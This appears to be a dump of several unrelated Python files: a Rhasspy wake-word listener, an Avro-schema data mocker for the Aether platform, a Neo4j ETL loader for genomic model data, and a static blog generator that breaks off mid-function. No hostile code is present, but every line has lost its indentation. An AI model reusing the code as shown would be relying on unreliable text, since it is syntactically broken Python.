"""Wake word listener that uses picovoice's porcupine library"""
def __init__(self):
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.chunk_format = ""
self.chunk_size = 1024
self.handle = None
self.keyword_paths: List[Path] = []
self.library_path = ""
self.model_path = ""
self.preload: bool = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.sensitivities = []
self.wake_proc = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.library_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.library_path", "porcupine/libpv_porcupine.so"
)
)
self.model_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.model_path", "porcupine/porcupine_params.pv"
)
)
self.keyword_paths = [
Path(self.profile.read_path(p))
for p in self.profile.get(
"wake.porcupine.keyword_path", "porcupine/porcupine.ppn"
).split(",")
]
self.sensitivities = [
float(s)
for s in str(self.profile.get("wake.porcupine.sensitivity", "0.5")).split(
","
)
]
self.preload = self.config.get("preload", False)
if self.preload:
try:
self.load_handle()
except Exception:
self._logger.exception("loading wake handle")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_handle()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("loading wake handle")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.handle is not None
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
unpacked_chunk = struct.unpack_from(self.chunk_format, chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
# Process chunk
keyword_index = self.handle.process(unpacked_chunk)
if keyword_index:
if len(self.keyword_paths) == 1:
keyword_index = 0
wakeword_name = str(keyword_index)
if keyword_index < len(self.keyword_paths):
wakeword_name = self.keyword_paths[keyword_index].stem
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", keyword_index)
result = WakeWordDetected(wakeword_name)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
if self.handle is not None:
self.handle.delete()
self.handle = None
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def load_handle(self):
"""Load porcupine library."""
if self.handle is None:
for kw_path in self.keyword_paths:
assert kw_path.is_file(), f"Missing {kw_path}"
from porcupine import Porcupine
self.handle = Porcupine(
self.library_path,
self.model_path,
keyword_file_paths=[str(p) for p in self.keyword_paths],
sensitivities=self.sensitivities,
)
# 16-bit
self.chunk_size = self.handle.frame_length * 2
self.chunk_format = "h" * self.handle.frame_length
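# Porcupine consumes frame_length 16-bit samples per call, so each chunk is
# frame_length * 2 bytes and "h" * frame_length unpacks it into the tuple of
# signed shorts passed to handle.process() in in_listening().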
self._logger.debug(
"Loaded porcupine (keyword=%s). Expecting sample rate=%s, frame length=%s",
self.keyword_paths,
self.handle.sample_rate,
self.handle.frame_length,
)
# -----------------------------------------------------------------------------
# Command Wake Listener
# -----------------------------------------------------------------------------
class CommandWakeListener(RhasspyActor):
"""Command-line based wake word listener"""
def __init__(self):
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.wake_proc = None
self.command: List[str] = []
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
program = os.path.expandvars(self.profile.get("wake.command.program"))
arguments = [
os.path.expandvars(str(a))
for a in self.profile.get("wake.command.arguments", [])
]
self.command = [program] + arguments
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.wake_proc = subprocess.Popen(self.command, stdout=subprocess.PIPE)
def post_result() -> None:
# STDOUT -> text
try:
out, _ = self.wake_proc.communicate()
wakeword_id = out.decode().strip()
except Exception:
wakeword_id = ""
self._logger.exception("post_result")
# Actor will forward
if wakeword_id:
self.send(self.myAddress, WakeWordDetected(wakeword_id))
else:
self.send(self.myAddress, WakeWordNotDetected(wakeword_id))
self.transition("listening")
# Wait for program in a separate thread
threading.Thread(target=post_result, daemon=True).start()
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, WakeWordDetected):
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", message.name)
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, WakeWordNotDetected):
# Pass downstream to receivers
for receiver in self.receivers:
self.send(receiver, message)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if self.wake_proc is not None:
self.wake_proc.terminate()
self.transition("started")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
|
mocker.py
|
# Copyright (C) 2019 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import signal
import string
from collections import namedtuple
from queue import Queue, Empty
from random import randint, uniform, choice, sample
from threading import Thread
from time import sleep
from uuid import uuid4
from aether.client import Client, AetherAPIException
from utils import LOGGER
class Generic(object):
'''
We keep our default mocking functions for each type here as generic
'''
@staticmethod
def boolean():
return choice([True, False])
@staticmethod
def float():
return uniform(.01, 1000.00)
@staticmethod
def int():
return randint(1, 99999)
@staticmethod
def null():
return None
@staticmethod
def string():
size = choice(range(3, 12))
return ''.join(sample(string.ascii_lowercase, size))
@staticmethod
def uuid():
return str(uuid4())
@staticmethod
def geo_lat():
return uniform(0.00000000000, 60.00000000000)
@staticmethod
def geo_lng():
return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
'''
An extensible tool that consumes an Avro Schema and creates junk data that matches it.
Data generation methods can be overridden on a per type [text, int, etc] basis via:
override_type(type_name, fn)
Override methods can also be passed on a property name basis [lat, lon, name] via:
override_property(property_name, fn)
'''
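# Illustrative usage sketch (hypothetical schema and names; override_property /
# override_type are defined further down in this class):
#
#     mocker = DataMocker("Person", raw_schema, parent_manager)
#     mocker.override_property("name", MockFn(choice, [["ada", "grace"]]))
#     mocker.override_type("string", MockFn(Generic.uuid))
#     record = mocker.get()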
def __init__(self, name, schema, parent):
self.MAX_ARRAY_SIZE = 4
self.QUEUE_WORKERS = 10
self.REUSE_COEFFICIENT = 0.85
self.name = name
self.raw_schema = schema
self.parent = parent
self.subschema = {}
self.primitive_types = [
'null',
'boolean',
'int',
'long',
'float',
'double',
'bytes',
'string'
]
self.type_methods = {
primitive: MockFn(self._default(primitive))
for primitive in self.primitive_types
}
self.created = [] # ids of created entities
self.reuse = 0 # number of recycled entity ids
self.count = 0 # number of entity references to this type
self.property_methods = {}
self.required = []
self.ignored_properties = []
self.restricted_types = {}
self.instructions = {}
self.killed = False
self._queue = Queue()
self.__start_queue_process()
self.override_property('id', MockFn(Generic.uuid))
self.load()
def _default(self, primitive):
if primitive in ['int', 'long']:
return Generic.int
if primitive in ['float', 'double']:
return Generic.float
if primitive == 'null':
return Generic.null
if primitive == 'string':
return Generic.string
if primitive == 'boolean':
return Generic.boolean
def kill(self):
self.killed = True
def __start_queue_process(self):
for _ in range(self.QUEUE_WORKERS):
worker = Thread(target=self.__reference_runner, args=[])
worker.daemon = False
worker.start()
def __reference_runner(self):
while True:
if self.killed:
break
try:
fn = self._queue.get(block=True, timeout=1)
fn()
except Empty:
if self.killed:
break
sleep(1)
except Exception as err:
raise err
def get_reference(self, exclude=None):
# called from other types to generate this one (lazily)
# returns an ID, either by registering a new instance
# or by returning a value from created
self.count += 1
thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
new = (randint(0, 100) >= thresh)
if new:
_id = self.quick_reference()
else:
items = self.created[:-4]
if items:
self.reuse += 1
_id = choice(items)
else:
_id = self.quick_reference()
return _id
def quick_reference(self):
# generates an id for this type
# queues a job to actually make the instance
_id = None
if self.property_methods.get('id'):
fn = self.property_methods.get('id')
_id = fn()
else:
fn = [
fn
for name, fn in self.instructions.get(self.name)
if name == 'id'
]
if not fn:
raise ValueError("Couldn't find id function")
_id = fn[0]()
deferred_generation = MockFn(self.fullfill_reference, [_id])
self._queue.put(deferred_generation)
return _id
def fullfill_reference(self, _id):
# the method called from the queue to create an instance
new_record = self.get(set_id=_id)
self.parent.register(self.name, new_record)
return _id
def get(self, record_type='default', set_id=None):
# Creates a mock instance of this type
# wraps _get
if record_type == 'default':
body = self._get(self.name)
if set_id:
body['id'] = set_id
self.created.append(body.get('id'))
return body
else:
return self._get(record_type)
def _get(self, name):
# actually compiles the instruction set for this type and returns the body
instructions = self.instructions.get(name)
if not instructions:
alt = self.parent.names.get(name)
instructions = self.instructions.get(alt)
if not instructions:
raise ValueError('No instructions for type %s' % name)
return {name: fn() for name, fn in instructions}
def gen(self, avro_type):
# generation of avro types
return self.type_methods.get(avro_type)
def gen_array(self, avro_type):
# generation of an array of any type
fn = self.gen(avro_type)
return MockFn(self._gen_array, [fn])
def _gen_array(self, fn):
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [fn() for i in range(size)]
def gen_random_type(self, name=None, avro_types=None):
avro_types = avro_types or []
return MockFn(self._gen_random_type, [name, avro_types])
def _gen_random_type(self, name, avro_types):
# picks one of the valid types available for the field and generates it
if name in self.required:
avro_types = [i for i in avro_types if i != 'null']
avro_type = choice(avro_types)
fn = None
if isinstance(avro_type, dict):
if avro_type.get('type', None) != 'array':
raise ValueError('unexpected type, %s' % avro_type.get('type'))
items = avro_type.get('items')
fn = self.gen_array(items)
return fn()
elif isinstance(avro_type, list):
if name in self.required:
avro_type = [i for i in avro_types if i != 'null']
avro_type = choice(avro_type)
if not avro_type in self.primitive_types:
fn = self.gen_complex(avro_type)
else:
fn = self.gen(avro_type)
return fn()
def gen_complex(self, avro_type):
return MockFn(self._gen_complex, avro_type)
def _gen_complex(self, name):
# handles generation of associated types
try:
return self._get(name)
except ValueError:
fn = self.gen('null')
return fn()
def gen_reference(self, name, avro_type, avro_types):
# gets a reference to a foreign type
# usually triggers creation via the other type's get_reference()
return MockFn(self._gen_reference, [name, avro_type, avro_types])
def _gen_reference(self, name, avro_type, avro_types):
if name in self.required:
avro_types = [i for i in avro_types if i != 'null']
chosen = choice(avro_types)
if isinstance(chosen, str):
return self.parent.get_reference(avro_type)
else:
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [self.get_reference(avro_type) for i in range(size)]
def ignore(self, property_name):
# turn off mocking for this property
self.ignored_properties.append(property_name)
def override_type(self, type_name, fn):
# provide an override method for an avro type
# fn is a MockFn object
self.type_methods[type_name] = fn
self.load()
def override_property(self, property_name, fn):
# overrides a property in this type by name with a new function
# for example, instead of returning a random string for the name field, pick from a list
# fn is a MockFn object
self.property_methods[property_name] = fn
self.load()
def load(self):
# loads schema definition for this type
self.schema = json.loads(self.raw_schema)
if isinstance(self.schema, list):
for obj in self.schema:
self.parse(obj)
else:
self.parse(self.schema)
def parse(self, schema):
# looks at all the types called for
# matches simple types to type_methods
# stubs external calls to parent for linked types
name = schema.get('name')
instructions = []
fields = schema.get('fields', [])
for field in fields:
instructions.append(self._comprehend_field(field))
self.instructions[name] = instructions
for i in self.instructions[name]:
LOGGER.debug('Add instruction to %s : %s' % (name, i))
def _comprehend_field(self, field):
# picks apart an avro definition of a field and builds mocking functions
name = field.get('name')
if name in self.ignored_properties:
return (name, self.gen('null')) # Return null function and get out
try:
ref_type = field.get('jsonldPredicate').get('_id')
avro_types = field.get('type')
# This is a reference property # TODO THIS MIGHT WANT TO BE sub_type
return (name, self.gen_reference(name, ref_type, avro_types))
except Exception:
pass # This is simpler than checking to see if this is a dictionary?
if name in self.property_methods.keys():
# We have an explicit method for this
return (name, self.property_methods.get(name))
avro_types = field.get('type')
if isinstance(avro_types, str):
return (name, self.gen(avro_types)) # Single type for this field
if name in self.restricted_types.keys():  # we've limited the types we want to mock
# restrict_type() narrows the permitted types, so intersect rather than union
avro_types = list(set(avro_types) & set(self.restricted_types.get(name)))
return tuple([name, self.gen_random_type(name, avro_types)])
def require(self, *property):
# Make a field never resolve to null (if null is an option)
# *property is always a tuple here, so extend with the individual names;
# appending the tuple itself would defeat the later `name in self.required` checks
self.required.extend(property)
def restrict_type(self, property_name, allowable_types=None):
# some properties can be completed by multiple types of properties
# for example [null, int, string[]?].
# restrict_type allows you to choose a subset of the permitted types for mocking
allowable_types = allowable_types or []
self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple('MockFn', ('fn', 'args'))):
# Function wrapper class containing fn and args
def __new__(cls, fn, args=None):
this = super(MockFn, cls).__new__(cls, fn, args)
return this
def __call__(self):
if self.args and not isinstance(self.args, list):
return self.fn(self.args)
try: # This lets us get very duck-type-y with the passed functions
return self.fn(*self.args) if self.args else self.fn()
except TypeError:
return self.fn(self.args)
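# MockFn call examples: MockFn(Generic.int)() returns a random int with no args;
# MockFn(uniform, [0, 1])() unpacks the list and calls uniform(0, 1);
# MockFn(len, "abc")() falls back to fn(args) and returns 3.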
class MockingManager(object):
def __init__(self, kernel_url, user, pw, log_level, realm, keycloak_url):
# connects to Aether and gets available schemas.
# constructs a DataMocker for each type
self.client = Client(kernel_url, user, pw,
log_level=log_level,
realm=realm,
keycloak_url=keycloak_url)
self.types = {}
self.alias = {}
self.names = {}
self.schema_decorator = {}
self.schema_id = {}
self.type_count = {}
signal.signal(signal.SIGTERM, self.kill)
signal.signal(signal.SIGINT, self.kill)
self.load()
def get(self, avro_type):
if not avro_type in self.types.keys():
msg = 'No schema for type %s' % (avro_type)
LOGGER.error(msg)
raise KeyError(msg)
return self.types.get(avro_type).get()
def get_reference(self, avro_type):
if not avro_type in self.types.keys():
msg = 'No schema for type %s' % (avro_type)
LOGGER.error(msg)
raise KeyError(msg)
return self.types.get(avro_type).get_reference()
def kill(self, *args, **kwargs):
for name, mocker in self.types.items():
LOGGER.info('Stopping thread for %s' % name)
mocker.kill()
def register(self, name, payload=None):
# register an entity of type 'name'
# if no payload is passed, an appropriate one will be created
count = self.type_count.get(name, 0)
count += 1
self.type_count[name] = count
if not payload:
payload = self.types[name].get()
# type_name = self.alias.get(name)
type_id = self.schema_id.get(name)
ps_id = self.schema_decorator.get(type_id)
data = self.payload_to_data(ps_id, payload)
try:
self.client.entities.create(data=data)
LOGGER.debug('Created instance # %s of type %s' % (self.type_count[name], name))
except AetherAPIException as err:
LOGGER.error('in creation of entity of type %s: %s' % (name, err))
return data
def payload_to_data(self, ps_id, payload):
# wraps data in expected aether jargon for submission
data = {
'id': payload['id'],
'payload': payload,
'schemadecorator': ps_id,
'status': 'Publishable'
}
return data
def load(self):
# loads schemas and project schemas from aether client
LOGGER.debug('Loading schemas from Aether Kernel')
for schema in self.client.schemas.paginated('list'):
name = schema.name
LOGGER.debug('Loading schema for type %s \n%s' % (name, schema))
_id = schema.id
definition = schema.definition
if isinstance(definition, str):
definition = json.loads(definition)
if isinstance(definition, list):
full_name = [
obj.get('name')
for obj in definition
if obj.get('name').endswith(name)
][0]
else:
full_name = definition.get('name')
namespace = definition.get('namespace')
if namespace and not name in namespace:
full_name = namespace + '.' + name
self.types[full_name] = DataMocker(full_name, json.dumps(definition), self)
self.names[name] = full_name
self.names[full_name] = name
self.types[name] = self.types[full_name]
self.alias[full_name] = name
self.alias[name] = full_name
self.schema_id[name] = _id
self.schema_id[full_name] = _id
self.schema_id[_id] = name
for ps in self.client.schemadecorators.paginated('list'):
schema_id = ps.schema
_id = ps.id
self.schema_decorator[schema_id] = _id
self.schema_decorator[_id] = schema_id
|
affected_genomic_model_etl.py
|
"""Affected Genomic Model ETL."""
import logging
import multiprocessing
from etl import ETL
from etl.helpers import TextProcessingHelper, ETLHelper
from files import JSONFile
from transactors import CSVTransactor, Neo4jTransactor
class AffectedGenomicModelETL(ETL):
"""ETL for adding Affected Genomic Model."""
logger = logging.getLogger(__name__)
# Query templates which take params and will be processed later
agm_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (s:Species {primaryKey: row.taxonId})
MERGE (o:AffectedGenomicModel {primaryKey:row.primaryId})
ON CREATE SET o.name = row.name,
o.nameText = row.nameText,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefUrl,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.nameText = row.nameText,
o.nameTextWithSpecies = row.nameTextWithSpecies,
o.nameWithSpecies = row.nameWithSpecies,
o.subtype = row.subtype
MERGE (o)-[:FROM_SPECIES]-(s)
"""
agm_secondary_ids_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (f:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (second:SecondaryId:Identifier {primaryKey:row.secondaryId})
SET second.name = row.secondary_id
MERGE (f)-[aka1:ALSO_KNOWN_AS]->(second)
"""
agm_sqtrs_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (sqtr:SequenceTargetingReagent {primaryKey:row.sqtrId})
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (agm)-[:SEQUENCE_TARGETING_REAGENT]-(sqtr)
"""
agm_synonyms_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (a:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE(syn:Synonym:Identifier {primaryKey:row.synonym})
SET syn.name = row.synonym
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn)
"""
agm_backgrounds_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MATCH (b:AffectedGenomicModel {primaryKey:row.backgroundId})
MERGE (agm)-[:BACKGROUND]-(b)
"""
agm_components_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (feature:Feature:Allele {primaryKey:row.componentId})
MATCH (agm:AffectedGenomicModel {primaryKey:row.primaryId})
MERGE (agm)-[agmf:MODEL_COMPONENT]-(feature)
SET agmf.zygosity = row.zygosityId
"""
def __init__(self, config):
"""Initialise object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
process = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
process.start()
thread_pool.append(process)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
self.logger.info("Loading Sequence Targeting Reagent Data: %s",
sub_type.get_data_provider())
filepath = sub_type.get_filepath()
self.logger.info(filepath)
data = JSONFile().get_data(filepath)
ETLHelper.load_release_info(data, sub_type, self.logger)
self.logger.info("Finished Loading Sequence Targeting Reagent Data: %s",
sub_type.get_data_provider())
if data is None:
self.logger.warning("No Data found for %s skipping", sub_type.get_data_provider())
return
# This order is the same as the lists yielded from the get_generators function.
# A list of tuples.
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
# This needs to be in this format (template, param1, params2) others will be ignored
query_template_list = [
[self.agm_query_template, commit_size,
"agm_data_" + sub_type.get_data_provider() + ".csv"],
[self.agm_secondary_ids_query_template, commit_size,
"agm_secondary_ids_" + sub_type.get_data_provider() + ".csv"],
[self.agm_synonyms_query_template, commit_size,
"agm_synonyms_" + sub_type.get_data_provider() + ".csv"],
[self.agm_components_query_template, commit_size,
"agm_components_" + sub_type.get_data_provider() + ".csv"],
[self.agm_sqtrs_query_template, commit_size,
"agm_sqtrs_" + sub_type.get_data_provider() + ".csv"],
[self.agm_backgrounds_query_template, commit_size,
"agm_backgrounds_" + sub_type.get_data_provider() + ".csv"]
]
# Obtain the generator
generators = self.get_generators(data, sub_type.get_data_provider(), batch_size)
query_and_file_list = self.process_query_params(query_template_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("AGM-{}: ".format(sub_type.get_data_provider()))
def cross_ref_process(self, agm_record):
"""Get cross reference."""
cross_ref = ""
if 'crossReference' not in agm_record:
return cross_ref
cross_ref = agm_record.get('crossReference')
cross_ref_id = cross_ref.get('id')
local_crossref_id = cross_ref_id.split(":")[1]
prefix = cross_ref.get('id').split(":")[0]
pages = cross_ref.get('pages')
# some pages collection have 0 elements
if pages is not None and len(pages) > 0:
for page in pages:
if page in ['Fish', 'genotype', 'strain']:
cross_ref = self.etlh.rdh2.return_url_from_key_value(
prefix, local_crossref_id, alt_page=page)
return cross_ref
def agm_process(self, agms, agm_record, date_produced):
"""Process agms."""
# TODO: make subtype required in submission file.
subtype = agm_record.get('subtype')
if subtype is None and self.data_provider == 'WB':
subtype = 'strain'
if subtype is None:
subtype = 'affected_genomic_model'
global_id = agm_record['primaryID']
local_id = global_id.split(":")[1]
short_species_abbreviation = self.etlh.get_short_species_abbreviation(agm_record.get('taxonId'))
name_text = TextProcessingHelper.cleanhtml(agm_record.get('name'))
mod_global_cross_ref_url = self.cross_ref_process(agm_record)
load_key = date_produced + self.data_provider + "_agm"
# TODO: name_text
agm_dataset = {
"primaryId": agm_record.get('primaryID'),
"name": agm_record.get('name'),
"globalId": global_id,
"localId": local_id,
"taxonId": agm_record.get('taxonId'),
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": load_key,
"subtype": subtype,
"modGlobalCrossRefUrl": mod_global_cross_ref_url,
"dataProvider": self.data_provider,
"nameText": name_text,
"nameWithSpecies": agm_record.get('name') + " (" + short_species_abbreviation + ")",
"nameTextWithSpecies": name_text + " (" + short_species_abbreviation + ")",
}
agms.append(agm_dataset)
def genmod_process(self, components, agm_record):
"""Process affected genomic Model components."""
if agm_record.get('affectedGenomicModelComponents') is None:
return
for component in agm_record.get('affectedGenomicModelComponents'):
component_dataset = {
"primaryId": agm_record.get('primaryID'),
"componentId": component.get('alleleID'),
"zygosityId": component.get('zygosity')
}
components.append(component_dataset)
def ppids_process(self, backgrounds, agm_record):
"""Parental Pop Ids process."""
if agm_record.get('parentalPopulationIDs') is None:
return
for background in agm_record.get('parentalPopulationIDs'):
background_dataset = {
"primaryId": agm_record.get('primaryID'),
"backgroundId": background
}
backgrounds.append(background_dataset)
def sqtr_process(self, sqtrs, agm_record):
"""Get sqtrs."""
if agm_record.get('sequenceTargetingReagentIDs') is None:
return
for sqtr in agm_record.get('sequenceTargetingReagentIDs'):
sqtr_dataset = {
"primaryId": agm_record.get('primaryID'),
"sqtrId": sqtr
}
sqtrs.append(sqtr_dataset)
def secondary_process(self, secondarys, data_record):
"""Get secondary ids.
secondarys: list of dataset items.
data_record: record to process.
"""
if data_record.get('secondaryIds') is None:
return
for sid in data_record.get('secondaryIds'):
secondary_id_dataset = {
"primaryId": data_record.get('primaryID'),
"secondaryId": sid
}
secondarys.append(secondary_id_dataset)
def synonyms_process(self, synonyms, data_record):
"""Get synonyms."""
if data_record.get('synonyms') is None:
return
for syn in data_record.get('synonyms'):
syn_dataset = {
"primaryId": data_record.get('primaryID'),
"synonym": syn.strip()
}
synonyms.append(syn_dataset)
def get_generators(self, agm_data, data_provider, batch_size):
"""Get Generators."""
agms = []
agm_synonyms = []
agm_secondary_ids = []
components = []
backgrounds = []
sqtrs = []
counter = 0
date_produced = agm_data['metaData']['dateProduced']
self.data_providers_process(agm_data)
for agm_record in agm_data['data']:
counter = counter + 1
global_id = agm_record['primaryID']
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(global_id)
if is_it_test_entry is False:
counter = counter - 1
continue
self.secondary_process(agm_secondary_ids, agm_record)
self.synonyms_process(agm_synonyms, agm_record)
self.agm_process(agms, agm_record, date_produced)
self.genmod_process(components, agm_record)
self.sqtr_process(sqtrs, agm_record)
self.ppids_process(backgrounds, agm_record)
            if counter == batch_size:
                yield [agms, agm_secondary_ids, agm_synonyms, components, sqtrs, backgrounds]
                agms = []
                agm_secondary_ids = []
                agm_synonyms = []
                components = []
                sqtrs = []
                backgrounds = []
                counter = 0
if counter > 0:
yield [agms, agm_secondary_ids, agm_synonyms, components, sqtrs, backgrounds]
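        # Worked example (not part of the original source): with batch_size = 2 and 5 AGM records,
        # this generator yields batches covering 2, 2 and finally 1 record (the trailing partial
        # batch comes from the `if counter > 0` check above). Each yield is the six-element list
        # [agms, agm_secondary_ids, agm_synonyms, components, sqtrs, backgrounds], matching the
        # order of query_template_list in _process_sub_type so each sub-list lands in its own CSV.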
|
mirage.py
|
#!/usr/bin/env python
import argh
import shutil
import os
import posixpath
import http.server
import socketserver
import threading
import time
import uglipyjs
import urllib.request, urllib.parse, urllib.error
import webbrowser
import yaml
from csscompressor import compress
from libcloud.storage.types import Provider, ContainerDoesNotExistError
from libcloud.storage.providers import get_driver
from markdown import markdown
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from src.cnsl import cnsl
try:
    with open("config.yml") as config_yml:
        config = yaml.safe_load(config_yml.read())
except Exception:
    config = {}
# Set up directory structure
blog_root = os.path.dirname(__file__)
posts_dir = os.path.join(blog_root, "posts")
pages_dir = os.path.join(blog_root, "pages")
resources_dir = os.path.join(blog_root, "resources")
build_dir = os.path.join(blog_root, "site")
build_posts_dir = os.path.join(build_dir, "posts")
build_resources_dir = os.path.join(build_dir, "resources")
def chunks(l, n):
"""
Yield successive n-sized chunks from l. Used for pagination.
http://stackoverflow.com/a/312464/319618
"""
for i in range(0, len(l), n):
yield l[i:i + n]
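# Example (not part of the original source):
#   list(chunks(list(range(7)), 3)) == [[0, 1, 2], [3, 4, 5], [6]]
# so a blog with 25 posts and a page size of 10 ends up with three index pages.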
def load_posts(directory, mode="post"):
for filename in os.listdir(directory):
post_filename = os.path.join(directory, filename)
with open(post_filename) as post_file:
split_filename = os.path.splitext(filename)
if len(split_filename) == 2 and split_filename[1] == ".md":
if split_filename[0].lower().endswith("_draft"):
cnsl.warn("Skipping draft file {}".format(filename))
continue
cnsl.ok("Compiling {} {}".format(mode, filename))
post_slug = split_filename[0].lower().replace(" ", "-")
new_filename = os.path.join(post_slug, "index.html")
url = "/" + \
os.path.join(
"posts", post_slug) if mode == "post" else "/" + post_slug
content = markdown(post_file.read())
yield {
'filename': new_filename,
'url': url,
'post-title': split_filename[0],
'content': content,
'date': time.ctime(os.path.getctime(post_filename))
}
else:
cnsl.warn("Ignoring file " + filename)
def write_posts(base_dir, posts, templates):
for post in posts:
full_path = os.path.join(base_dir, post['filename'])
os.makedirs(os.path.split(full_path)[0])
with open(full_path, "w") as published:
cnsl.success("Writing post " + post['filename'])
write_template(published, post, templates)
def render_post(template, post):
return (template
.replace("{{content}}", post["content"])
.replace("{{permalink}}", post["url"])
.replace("{{post-title}}", post["post-title"])
.replace("{{post-date}}", post["date"]))
def write_template(file, post, templates):
file.write(templates["base"]
.replace("{{posts}}", render_post(templates["post"], post))
.replace("{{pagination}}", ""))
def page_url(n):
return "/" if n == 1 else "/" + str(n)
def render_pages(total_pages, current_page):
if total_pages == 1:
return ''
pages_string = '<a href="{}">< Newer</a> • '.format(
page_url(current_page - 1)) if current_page > 1 else ''
for i in range(1, total_pages + 1):
if current_page == i:
pages_string += str(i) + " "
else:
pages_string += '<a href="{}">{}</a> '.format(page_url(i), i)
pages_string += ' • <a href="{}">Older ></a>'.format(
page_url(current_page + 1)) if current_page < total_pages else ''
return pages_string
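# Example (not part of the original source): render_pages(3, 2) returns roughly
#   '<a href="/">< Newer</a> • <a href="/">1</a> 2 <a href="/3">3</a>  • <a href="/3">Older ></a>'
# i.e. a "Newer" link back to page 1, the current page as plain text, and an "Older" link to page 3.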
def move_resource(file, filename, filetype, compile_function=lambda x: x):
split_filename = os.path.splitext(filename)
if split_filename[0][-4:] == ".min":
new_filename = filename
else:
new_filename = split_filename[0] + ".min." + filetype
mode = "wb" if filetype == "js" else "w"
with open(os.path.join(build_resources_dir, filetype, new_filename), mode) as published:
if split_filename[0][-4:] == ".min":
cnsl.success("Copying minified {} file: {}".format(filetype, filename))
published.write(file.read())
else:
cnsl.success("Minifying {} file: {}".format(filetype, filename))
published.write(compile_function(file.read()))
return new_filename
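# Example behaviour (not part of the original source): "style.css" is minified and written out as
# "style.min.css", while an already-minified "app.min.js" is copied through with its name intact;
# the returned filename is what later ends up in the generated <link>/<script> headers.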
def move_image(file, filename):
